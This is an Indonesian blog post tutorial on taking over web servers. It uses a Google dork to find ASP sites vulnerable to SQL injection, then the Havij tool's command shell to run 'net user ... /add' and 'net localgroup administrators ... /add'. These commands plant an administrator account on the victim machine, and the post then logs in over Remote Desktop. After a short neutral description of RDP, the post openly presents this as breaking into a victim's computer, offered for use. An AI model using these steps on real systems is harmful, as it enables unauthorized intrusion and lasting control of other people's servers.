Jumat, 07 Oktober 2016

Tutorial Mencari RDP Menggunakan HAVIJ

Remote Desktop Protocol (sering disingkat menjadi RDP) adalah sebuah protokol jaringan yang digunakan oleh Microsoft Windows Terminal Services dan Remote Desktop. RDP dibuat berdasarkan protokol T.120 yang spesifikasinya diumumkan oleh International Telecommunication Union (ITU), yang juga merupakan protokol yang digunakan di dalam perangkat lunak konferensi jarak jauh Microsoft NetMeeting.
Klien-klien yang mendukungnya bervariasi, mulai dari sebagian besar sistem operasi Windows 32-bit (termasuk Windows CE dan PocketPC), hingga sistem operasi lainnya, seperti Linux, FreeBSD, UNIX Solaris, dan Apple Mac OS X. Secara default, server yang membuka protokol ini, akan membuka port TCP 3389.


Saat ini saya akan berbagi bagaimana langkahnya kita memperoleh akses server  memanfaatkan havij. tidak senantiasa kita mengendalikan situs dengan shell tak tahu b374k atau lotus, atau apa pun nama shellnya, kita juga dapat memakai fitur bawaan windows yakni remote desktop, cuma saja kita tetep mesti tahu username serta password untuk dapat terhubung server korban
Apabila kita lakukan teknik sql injection serta memperoleh username serta password korban belum pasti itu sama untuk login ke computer, lah terus harus bagaimana ? Kita dapat memakai havij untuk itu.

Step by stepnya :

  • Dork : inurl:/*.asp?id=
  • TOOLS HAVIJ
1. Saya anggap kawan udah punya sebuah target yang di scan menggunakan havij ( table sudah terbuka )

2. Jika sudah , Silahkan kawan pilih icon CMD SHELL kemudian pilih “net user (nama login kesukaan) (password) /add” dan kita klik “execute”


3. Setelah selesai kita pilih “net localgroup administrators (nama login kesukaan) /add” dan klik lagi “execute”
sshot-2

DORRR… Cara pertama udah selesai
Lanjut., kita buka fasilitas windows nya , dengan cara start -> all programs -> accessories -> remote desktop

sshot-3

5. Masukkan username dan password yang udah kita buat tadi.


sshot-4

Dan akhirnya kita bisa masuk ke komputer korban hehehehehehehe….!!!


sshot-5


SUMBER

Oke segitu saja semoga paham. Sekian Terimakasih

 

1 comments so far


Emoticon Emoticon